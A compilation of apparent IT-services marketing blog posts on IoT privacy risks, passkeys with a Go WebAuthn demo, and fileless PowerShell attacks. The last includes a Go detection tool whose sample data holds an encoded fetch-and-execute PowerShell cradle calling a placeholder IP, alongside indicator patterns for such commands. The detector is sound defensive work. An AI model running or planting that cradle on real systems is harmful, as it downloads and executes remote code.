
Top 5 Threats IoT Devices Pose to Data Protection & Privacy

Gartner Inc. predicted that by 2023, CIOs would be responsible for over three times the endpoints they were responsible for in 2018 due to the rapid evolution of IoT trends and technologies. With billions of physical devices worldwide connected to the internet today, this prediction is on its way to coming true. However, the rapid evolution of IoT technology has proven to be a double-edged sword from a cybersecurity and compliance standpoint.

IoT devices produce immense volumes of various types of data that are stored, managed and shared within an organization’s IT infrastructure. Hence, they add to the risk landscape in more ways than one with respect to cybersecurity, third-party risk and compliance with data protection regulations.

Don’t let anyone tell you that securing IoT devices is only about securing the device itself. It’s also about securing the access that an IoT device provides. Besides looking at the device’s built-in vulnerabilities, you must also consider where and how IoT devices connect to your network, how they process and store data, and their user interface.

Over the course of this blog, we’ll tell you how IoT devices can be exploited, the top 5 threats they pose to data protection and privacy, and why you must secure them from a compliance point of view. Please pay close attention so you can protect your business from security disasters and avoid penalties and lawsuits that could arise from non-compliance with necessary regulations.
How IoT Devices Can Be Exploited
There are primarily three attack vectors through which IoT devices can be compromised:

• The devices themselves: Attackers exploit vulnerabilities in the device's firmware, memory handling, physical interfaces (including debug ports), web interface and exposed network services. Insecure default settings (notably default or hard-coded credentials), outdated third-party components and update mechanisms that do not verify the authenticity of new firmware are exploited just as often.
• Communication channels: A device can also be compromised by attacking the channels that connect it to other devices, gateways and cloud back ends. Weaknesses in the protocols IoT systems use, such as unencrypted or unauthenticated traffic, put the whole network at risk and leave IoT deployments open to network attacks such as denial of service (DoS), spoofing and man-in-the-middle interception.
• Applications and software: Attackers exploit vulnerabilities in the web and mobile applications, cloud services and companion software that manage IoT devices. Web applications, for example, can be targeted to steal user credentials or to push malware to the devices they control.

Five Major Threats to Watch Out for
Having understood how IoT devices can be exploited to cause harm to your business, let’s now look at five major threats these devices pose to data protection and privacy. If you don’t take the necessary measures to mitigate these threats and maintain documented evidence of it, you can be penalized for non-compliance with at least one data protection regulation at some point.

  1. Abundant and Unauthorized Data Collection
    IoT sensors and devices collect enormous amounts of very specific data about the environment they are deployed in and about the people who use them. Often they store and share sensitive data without the data subject's knowledge or explicit consent. Under the regulations that apply to your business or industry, this data must be secured the same way as any other sensitive data on your network. For example, if you collect medical data in the U.S. through a set of IoT devices, you must safeguard it under HIPAA.

  2. A Backdoor Entry for Cybercriminals
    All it takes for an attacker to ransack your network is a single IoT device that is not fully secured. Even a malicious insider could carry out a full-fledged cyberattack on your business through an insecure IoT device. Leaving these threats unchecked is unacceptable under any data protection regulation and warrants your immediate attention.
    • About 60% of IoT devices are vulnerable to medium- or high-severity attacks.1
    • Over 95% of all IoT device traffic is unencrypted.2
    • About 72% of organizations experienced an increase in endpoint and IoT security incidents last year and 56% of organizations expect to be compromised via an endpoint or IoT-originated attack within the next 12 months.

  3. A Single Security Policy Doesn’t Cut It
    IoT ecosystems are complex and add to the complexity of your IT environment. Given how different the devices are, a "one size fits all" security policy for all IoT devices is neither realistic nor currently achievable. The surge in remote work has amplified this challenge further.
    For example, many businesses keep personal devices out of the office, but during the COVID-19 pandemic employees have them at home, which is now their office, so business data could be reached by compromising those devices.
    The Ponemon Institute's 2021 Data Exposure Report stated that home networks are 71% less secure than office networks. Should your business fail to mitigate this threat, it could result in severe consequences when the compliance auditor comes knocking.

  4. Inability to Train Everyone on IoT Security
    Security awareness training is a powerful way to curtail the likelihood and impact of cyberattacks. However, the lack of broad knowledge and awareness about IoT at the user level poses a potent threat to the protection of IoT data. Training everyone on how IoT devices work and the risks they bring is an enormous challenge.

    Compliance regulations worldwide treat security awareness training as a major piece of the data protection puzzle, and its absence can decide a compliance audit against your business.

  5. Threat to Privacy
    IoT devices pose a direct threat to the privacy of your clients and of their customers. With every piece of data they provide to your business through an IoT device, they surrender some of their privacy, so it is your responsibility to protect that data. Failing to do so can cost you dearly. For example, under the EU's GDPR data subjects have a right to erasure (the "right to be forgotten"), and a business that cannot honor such requests for data held on or collected through IoT devices can be penalized for non-compliance.


IoT Risks and Compliance
While there are no universal regulatory requirements or “standards” for the security of IoT devices, please do not assume that risks to IoT data and devices aren’t on the radar of regulators worldwide. This isn’t just a matter of cybersecurity but compliance as well. While investing in the right security solutions will enhance your business’ cybersecurity posture against IoT-related risks, you certainly need assistance in tackling this challenge from a compliance point of view.

Using our compliance process automation platform, we can help you detect IoT risks in regular compliance risk assessments, undertake remediation measures and produce automatically generated documented evidence of compliance. To top it all off, you will be able to prevent IoT-related risks associated with compliance standards such as HIPAA, GDPR, Essential Eight and NIST CSF, as well as your cyber insurance policy. All you need to do is send us an email and we can help you get started.


Is It Time to Ditch the Passwords for More Secure Passkeys?

Passwords are the most used method of authentication, but they are also one of the weakest. They are often easy to guess or steal, and many people reuse the same password across several accounts, so one breach exposes all of them. The sheer number of passwords people need to remember pushes them into habits that make breaches easier, such as choosing weak passwords or storing them insecurely. 61% of all data breaches involve stolen or hacked login credentials. In recent years a better solution has emerged: passkeys. Passkeys are more secure than passwords and provide a more convenient way of logging into your accounts.

What is Passkey Authentication?

A passkey is a digital credential that lets someone sign in to a web service or cloud account without typing a username and password. It is built on Web Authentication (WebAuthn), a core component of the FIDO2 standard, and relies on public-key cryptography rather than a shared secret. When a user registers, their device creates a key pair for that site: the private key stays on the device (a computer, phone or hardware security key) and only the public key is sent to the service. At each login the service sends a fresh random challenge; the device, after the user unlocks it with a fingerprint, face scan or PIN, signs the challenge with the private key, and the service verifies the signature against the stored public key. Nothing reusable ever crosses the network, and a breach of the service's database yields only public keys.

Advantages of Using Passkeys Instead of Passwords

More Secure

One advantage of passkeys is that they are more secure than passwords. There is no shared secret to guess, phish or leak: the private key never leaves the user's device, and the server stores only a public key that is useless to an attacker on its own. Access to the private key is gated locally by the device's unlock method, such as facial recognition, a fingerprint scan or a PIN, and that biometric data stays on the device rather than being sent to the site. Each credential is also bound to the web origin it was created for, which makes it much harder for an attacker to gain access to your accounts.

More Convenient

Another advantage of passkeys over passwords is convenience. With password authentication, users often must remember many complex passwords, which is difficult and time-consuming. Forgetting passwords is common, and a reset slows an employee down: each one takes an average of three minutes and 46 seconds. Passkeys remove this burden. Each site still gets its own unique key pair, but the user unlocks all of them with the same gesture they already use to unlock the device, and passkeys can be synced across a user's devices through their platform account. There is nothing to remember, so there is no password to forget or misplace.

Phishing-Resistant

Credential phishing scams are prevalent. Scammers send emails telling a user something is wrong with their account; the user clicks a link that leads to a disguised login page built to steal their username and password. Against a passkey this does not work. The browser scopes each passkey to the domain it was registered for and will not offer it to a look-alike domain, and the signed response includes the real origin, so even a relayed login attempt fails verification. Even if an attacker had a user's password, it would not matter: they would need the private key on the user's device to get into the account.
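To make the challenge/response mechanism and the phishing resistance described above concrete, here is an added example in Go. It is written for this page and is not code from the original article or from any FIDO or WebAuthn implementation. It assumes a hypothetical relying party at example.com and a look-alike phishing domain examp1e.com, and it simplifies the real WebAuthn client data and authenticator data to a hash of origin and challenge; the structure of the signed message (hash of the relying party ID, then the client data hash) follows the WebAuthn layout, and ES256 (ECDSA over P-256) is the algorithm every authenticator must support.

```go
package main

import (
	"bytes"
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
)

// Authenticator models the user's device. It holds one key pair per relying
// party ID (the site's registrable domain); the private key never leaves it.
type Authenticator struct {
	keys map[string]*ecdsa.PrivateKey
}

func NewAuthenticator() *Authenticator {
	return &Authenticator{keys: map[string]*ecdsa.PrivateKey{}}
}

// Credential is all the server keeps after registration: a public key scoped
// to the rpID. A database leak exposes nothing an attacker can log in with.
type Credential struct {
	RPID   string
	Public *ecdsa.PublicKey
}

// Register creates a fresh ES256 (P-256 ECDSA) key pair for rpID.
func (a *Authenticator) Register(rpID string) (Credential, error) {
	priv, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return Credential{}, err
	}
	a.keys[rpID] = priv
	return Credential{RPID: rpID, Public: &priv.PublicKey}, nil
}

// NewChallenge is the server's per-login random nonce. Signing it proves the
// device holds the private key right now and blocks replay of old responses.
func NewChallenge() ([]byte, error) {
	c := make([]byte, 32)
	_, err := rand.Read(c)
	return c, err
}

// Assertion is the signed login response.
type Assertion struct {
	Origin    string // origin the browser recorded in the client data
	Challenge []byte
	Signature []byte
}

// digest mirrors WebAuthn's signed message: sha256(rpID) || sha256(clientData),
// hashed once more because ES256 signs a 32-byte digest. (Simplified layout,
// an assumption of this example.)
func digest(rpID, origin string, challenge []byte) []byte {
	rpHash := sha256.Sum256([]byte(rpID))
	clientHash := sha256.Sum256([]byte(origin + "|" + string(challenge)))
	d := sha256.Sum256(append(rpHash[:], clientHash[:]...))
	return d[:]
}

// Assert signs the challenge only if the device holds a key for rpID, which
// the browser derives from the page's real origin, not from anything the page
// claims. A look-alike domain therefore gets "no passkey" instead of a login.
func (a *Authenticator) Assert(rpID, origin string, challenge []byte) (Assertion, error) {
	priv, ok := a.keys[rpID]
	if !ok {
		return Assertion{}, errors.New("no passkey registered for " + rpID)
	}
	sig, err := ecdsa.SignASN1(rand.Reader, priv, digest(rpID, origin, challenge))
	if err != nil {
		return Assertion{}, err
	}
	return Assertion{Origin: origin, Challenge: challenge, Signature: sig}, nil
}

// Verify is the relying party's check: the challenge is the one it issued,
// the origin is its own, and the signature verifies under the stored key.
func Verify(cred Credential, expectedOrigin string, issued []byte, as Assertion) error {
	if !bytes.Equal(issued, as.Challenge) {
		return errors.New("challenge mismatch (stale or replayed)")
	}
	if as.Origin != expectedOrigin {
		return errors.New("origin mismatch: " + as.Origin)
	}
	if !ecdsa.VerifyASN1(cred.Public, digest(cred.RPID, as.Origin, as.Challenge), as.Signature) {
		return errors.New("signature does not verify")
	}
	return nil
}

// Login runs one complete exchange for the given page origin.
func Login(a *Authenticator, cred Credential, rpID, origin string) error {
	ch, err := NewChallenge()
	if err != nil {
		return err
	}
	as, err := a.Assert(rpID, origin, ch)
	if err != nil {
		return err
	}
	return Verify(cred, "https://"+cred.RPID, ch, as)
}

func main() {
	device := NewAuthenticator()
	cred, _ := device.Register("example.com")
	fmt.Println("real site:", Login(device, cred, "example.com", "https://example.com"))
	// Phishing page on a look-alike domain: the browser scopes the request to
	// the look-alike's rpID, for which no passkey exists.
	fmt.Println("phish:", Login(device, cred, "examp1e.com", "https://examp1e.com"))
}
```

A production relying party would use a WebAuthn library and parse the real CBOR and JSON structures, but the three checks in Verify (fresh challenge, expected origin, signature under the registered public key) are exactly what makes the phished page useless: it cannot obtain an assertion for a domain it does not own, and an assertion it somehow relayed would carry the wrong origin.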

Are There Any Disadvantages to Using Passkeys?

Passkeys are definitely looking like the future of authentication technology. But there are some issues that you may run into when adopting them right now.

Passkeys Aren’t Yet Widely Adopted

One of the main disadvantages is that passkeys are not yet widely adopted. Many websites and cloud services still rely on passwords and have no passkey capability, so users may have to keep using passwords for some accounts until adoption spreads. Using passkeys for some accounts and passwords for others can feel slightly awkward.

Passkeys Need Extra Hardware & Software

Passwords are free and easy to start with: you simply make them up as you sign up for a site. Passkeys need support on both sides. The user's device must have an authenticator (most current phones, laptops and browsers now ship one, and hardware security keys are an option), and the service must implement WebAuthn in its registration and login flows. That can be costly for businesses to put in place at first, but the savings from fewer breaches and fewer password resets can outweigh the cost.

Prepare Now for the Future of Authentication

Passkeys are a more secure and convenient alternative to passwords: they are harder to compromise and easier to use. They are not yet widely adopted, and businesses may need to budget for implementation. Despite these challenges, passkeys are a promising answer to the problem of weak passwords, with the potential to improve cybersecurity and boost productivity for businesses and individuals alike.

Need Help Improving Your Identity & Account Security?

Take advantage of the new passkey authentication by exploring it now. It’s the perfect time to ease in and begin putting it in place for your organization. Give us a call today to schedule a consultation. Article used with permission from The Technology Press.


4 Reasons Cybersecurity Attack Surfaces Are Expanding

The COVID-19 pandemic impacted individuals and businesses all over the world in one way or another. Almost overnight, it disrupted the way people went about their daily routines and how companies operated. Amidst all the chaos, changes to the cyber landscape increased at an unprecedented pace. Some of the trends that powered these changes and continue to fuel them are:

1. Increased Use of Internet of Things (IoT)
• About 56 federal agencies in the U.S. reported using Internet of Things (IoT) technologies.1
• In 2021, experts expect the number of connected devices to reach 10.07 billion.2

2. Rapid Adoption of the Cloud
• Global public cloud end-user expenditure is expected to grow by over 18% in 2021.3

3. Digital Transformation
• IT spending is expected to hit $3.9 trillion in 2021.3
• Spending on digital transformation technologies increased from $1 trillion in 2018 to $2.39 trillion in 2021.2

4. Work-From-Home Model
• Over 70% of all departments and teams are expected to have remote workers by 2028.4

With an expanding attack surface comes cybercrime. According to an FBI report, cyberattacks have skyrocketed by over 400% since the start of the pandemic, making it imperative to identify and deflate cyberthreats for the health and future of your business.

Growing Cybersecurity Risks

1. Targeted Ransomware Attack
Ransomware attacks have long been a nuisance to businesses. Experts have estimated that about 10% of breaches reported in 2021, so far, involved ransomware.5 The success of this mode of attack is attributed to the simplicity with which an attacker can wreak havoc. It should worry everyone that ransomware kits are inexpensively available on the dark web.
Ransomware propagators are constantly devising new plans to evade defenses set by businesses. Without precautionary measures in place, SMBs could find themselves at risk.

2. Phishing Attacks
Phishing uses social engineering in email and cloud services attacks. Phishing attacks can lead to account takeover, credential theft and more. According to one report, phishing attacks increased by 11% in 2021 alone.5

Malicious actors using phishing scams as their method of attack are cunning enough to tilt every global event to their advantage. For example, when the pandemic started, phishing emails were sent out to the masses in the name of the World Health Organization (WHO). Later, when vaccines were rolled out, scam emails had a vaccine company’s name as the sender.

3. Insider Threats
Shockingly, close to 20% of breaches involve internal actors.5 The problem with insider threats is that they’re often the toughest to detect.

The most common causes of inside incidents are:
• Negligent employees or contractors – 62%6
• Criminal or malicious insiders – 23%6
• Credential theft – 14%6

4. Fileless Attacks
A fileless attack lives off the features and tools already present in the victim's environment. It does not rely on a payload written to disk, so it leaves few of the artifacts that traditional file-scanning antivirus looks for and is much harder to detect. A fileless attack is reported to be 10 times more successful than a file-based attack.7

Fileless attacks often begin with an email that leads you to a malicious website. From there, using social engineering, the attacker abuses built-in system tools such as PowerShell or WMI to pull payloads into memory and execute commands. Because these tools are a legitimate part of your IT environment, the activity can slip past outdated security controls; catching it takes visibility into process command lines and script execution (for example, PowerShell script block logging) rather than file scans.
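As an added example (not from the original article, and not any product's detection rules), the following Go program applies the kind of check a defender would run over process-creation command lines: it decodes PowerShell's -EncodedCommand argument (base64 over the UTF-16LE bytes of the script), scans both the outer command line and the decoded script for living-off-the-land indicators, and flags lines that stack several of them. The sample command lines, the field layout and the 203.0.113.5 address (a documentation range) are constructed for the example; the indicator list is a starting point, not a complete ruleset.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"regexp"
	"strings"
	"unicode/utf16"
)

// Indicator patterns for living-off-the-land PowerShell use. Each is matched
// case-insensitively against the command line and, when an -EncodedCommand
// payload is present, against the decoded script as well. PowerShell accepts
// several abbreviations of each switch; the patterns cover the common ones.
var indicators = []struct {
	name string
	re   *regexp.Regexp
}{
	{"encoded-command", regexp.MustCompile(`(?i)(?:^|\s)-e(?:nc(?:odedcommand)?|c)?\s+[A-Za-z0-9+/=]{16,}`)},
	{"hidden-window", regexp.MustCompile(`(?i)-w(?:indowstyle)?\s+hidden`)},
	{"no-profile", regexp.MustCompile(`(?i)-nop(?:rofile)?\b`)},
	{"policy-bypass", regexp.MustCompile(`(?i)-e(?:xecutionpolicy|p)\s+bypass`)},
	{"download-cradle", regexp.MustCompile(`(?i)(?:Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\s)`)},
	{"invoke-expression", regexp.MustCompile(`(?i)(?:\bIEX\b|Invoke-Expression)`)},
	{"base64-in-script", regexp.MustCompile(`(?i)FromBase64String`)},
}

// encodedArg captures the base64 blob that follows -enc / -ec / -EncodedCommand.
var encodedArg = regexp.MustCompile(`(?i)(?:^|\s)-e(?:nc(?:odedcommand)?|c)?\s+([A-Za-z0-9+/=]{16,})`)

// DecodeEncodedCommand reverses PowerShell's -EncodedCommand encoding:
// base64 over the UTF-16LE bytes of the script.
func DecodeEncodedCommand(b64 string) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	if len(raw)%2 != 0 {
		return "", fmt.Errorf("odd byte count, not UTF-16LE")
	}
	u := make([]uint16, len(raw)/2)
	for i := range u {
		u[i] = uint16(raw[2*i]) | uint16(raw[2*i+1])<<8
	}
	return string(utf16.Decode(u)), nil
}

// EncodeCommand is the inverse; used here only to build realistic sample data.
func EncodeCommand(script string) string {
	u := utf16.Encode([]rune(script))
	raw := make([]byte, 2*len(u))
	for i, c := range u {
		raw[2*i] = byte(c)
		raw[2*i+1] = byte(c >> 8)
	}
	return base64.StdEncoding.EncodeToString(raw)
}

// Finding is the result for one command line.
type Finding struct {
	Line       string
	Indicators []string // names from the indicators table, in table order
	Decoded    string   // decoded -EncodedCommand payload, if any
}

// Analyze decodes any encoded payload, then scans outer and inner text.
func Analyze(cmdLine string) Finding {
	f := Finding{Line: cmdLine}
	text := cmdLine
	if m := encodedArg.FindStringSubmatch(cmdLine); m != nil {
		if dec, err := DecodeEncodedCommand(m[1]); err == nil {
			f.Decoded = dec
			text += "\n" + dec
		}
	}
	for _, ind := range indicators {
		if ind.re.MatchString(text) {
			f.Indicators = append(f.Indicators, ind.name)
		}
	}
	return f
}

// Triage keeps the lines worth an analyst's attention: two or more indicators
// on one command line. The threshold is a tuning choice for the environment.
func Triage(cmdLines []string) []Finding {
	var out []Finding
	for _, l := range cmdLines {
		if f := Analyze(l); len(f.Indicators) >= 2 {
			out = append(out, f)
		}
	}
	return out
}

// SampleEvents returns constructed command-line fields from process-creation
// events: a scheduled script, a classic in-memory download cradle hidden
// behind -enc, and an admin's one-off query that should not be flagged.
func SampleEvents() []string {
	cradle := `IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/s.ps1')`
	return []string{
		`powershell.exe -File C:\Scripts\nightly-backup.ps1`,
		`powershell.exe -nop -w hidden -ep bypass -enc ` + EncodeCommand(cradle),
		`powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"`,
	}
}

func main() {
	for _, f := range Triage(SampleEvents()) {
		fmt.Printf("SUSPICIOUS [%s]\n  %s\n  decoded: %s\n",
			strings.Join(f.Indicators, ", "), f.Line, f.Decoded)
	}
}
```

Decoding the payload is what gives this rule its teeth: the outer command line shows only flags, while the cradle (IEX plus a WebClient download) lives entirely inside the base64 blob. The same approach extends to nested encodings and to script block logs, where the decoded text is already available.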

How to Stay Protected

You can ramp up your IT security and protect your business by following these steps:

• Keep your systems updated and safe from cyberattacks that exploit known software vulnerabilities by automating patch and vulnerability management.
• Ensure effective and quick recovery from cyber disruption by backing up your systems and SaaS applications.
• Secure your systems by deploying advanced antivirus and antimalware solutions that provide endpoint detection and response (EDR).
• Make sure every new device has the necessary security tools to start with — local firewall, DNS filtering, malware protection, multifactor authentication (MFA) and disk encryption.
• Always be ready with an incident response plan. No breach can shake you if you have a robust action plan. The plan should have a communication strategy with all stakeholders, including your investors and valued customers.
• Provide regular security training to your employees and vendors.

If thinking about assessing your current cybersecurity posture gives you anxiety and you’re not sure where to start, don’t worry. We can take the assessment off your plate and suggest the right solutions for your business. An experienced partner like us can make your cybersecurity journey seamless and successful. Contact us today for your cybersecurity assessment.

 

Sources:
1. US GAO-20-577 Report
2. Statista
3. Gartner
4. Upwork Report
5. Verizon 2021 DBIR
6. 2020 Cost of Insider Threats: Global Report
7. Ponemon Institute


The Secret to Fighting Ransomware

Understanding How It Begins

Our infographic will walk you through the lifecycle of a ransomware attack step by step.

Every business owner knows ransomware is awful, but do you really understand what it is, how it works and to what extent it can damage your business?

Our infographic, “The Anatomy of a Ransomware Attack,” explains the seven key steps hackers take to successfully infiltrate an organization’s network. You’ll get a better understanding of:

  • How a cyber gang starts its operation
  • How they pick targets
  • How they get paid
  • And more

Don’t let hackers stop you from achieving your business goals. Download the infographic now to learn how ransomware works and stop cybercriminals in their tracks.